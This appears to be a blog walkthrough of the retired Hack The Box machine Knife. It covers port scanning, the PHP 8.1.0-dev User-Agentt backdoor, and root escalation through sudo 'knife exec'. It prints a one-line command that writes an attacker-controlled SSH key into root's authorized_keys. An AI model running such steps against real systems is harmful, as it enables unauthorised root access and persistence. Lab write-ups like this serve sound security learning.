This post documents the complete walkthrough of Knife, a retired vulnerable VM created by MrKN16H, and hosted at Hack The Box. If you are uncomfortable with spoilers, please stop reading now.

On this post

Background

Knife is a retired vulnerable VM from Hack The Box.

Information Gathering

Let’s start with a masscan probe to establish the open ports in the host.

masscan -e tun0 -p1-65535,U:1-65535 10.10.10.242 --rate=500
Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2021-05-24 00:49:40 GMT
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 80/tcp on 10.10.10.242
Discovered open port 22/tcp on 10.10.10.242

Nothing unusual stood out. Let’s do one better with nmap scanning the discovered ports to establish their services.

nmap -n -v -Pn -p22,80 -A --reason 10.10.10.242 -oN nmap.txt
...
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 be:54:9c:a3:67:c3:15:c3:64:71:7f:6a:53:4a:4c:21 (RSA)
|   256 bf:8a:3f:d4:06:e9:2e:87:4e:c9:7e:ab:22:0e:c0:ee (ECDSA)
|_  256 1a:de:a1:cc:37:ce:53:bb:1b:fb:2b:0b:ad:b3:f6:84 (ED25519)
80/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.41 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title:  Emergent Medical Idea

Hmm. I guess the path to foothold is through http service. This is what it looks like.

This is a shit-show man. There is nothing—no hyperlinks—no nothing.

PHP 8.1.0-dev Backdoor Remote Command Execution

It was only when I noticed the PHP version used then I realized I’m looking at a PHP backdoor.

According to this repo,

An early release of PHP, the PHP 8.1.0-dev version was released with a backdoor on March 28th 2021, but the backdoor was quickly discovered and removed. If this version of PHP runs on a server, an attacker can execute arbitrary code by sending the User-Agentt header.

Bingo!

Foothold

Armed with this insight, it’s not very difficult to get a proper shell.

The file user.txt is at james’ home directory.

Privilege Escalation

During enumeration of james’ account, I notice that james is able to sudo the following commands.

GTFOBins - knife exec

Check this out.

Use the knife exec subcommand to execute Ruby scripts in the context of a fully configured Chef Infra Client. Use this subcommand to run scripts that will only access Chef Infra Server one time (or otherwise very infrequently) or any time that an operation does not warrant full usage of the knife subcommand library.

I’d simply write a SSH public key I control to /root/.ssh/authorized_keys and call it a day.

sudo knife exec -E 'File.write("/root/.ssh/authorized_keys", "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPEyLBRKTB13FoHcIAf4DKPh9aE8NOsYN+WTXcIreESy\n", mode: "a")'

:dancer: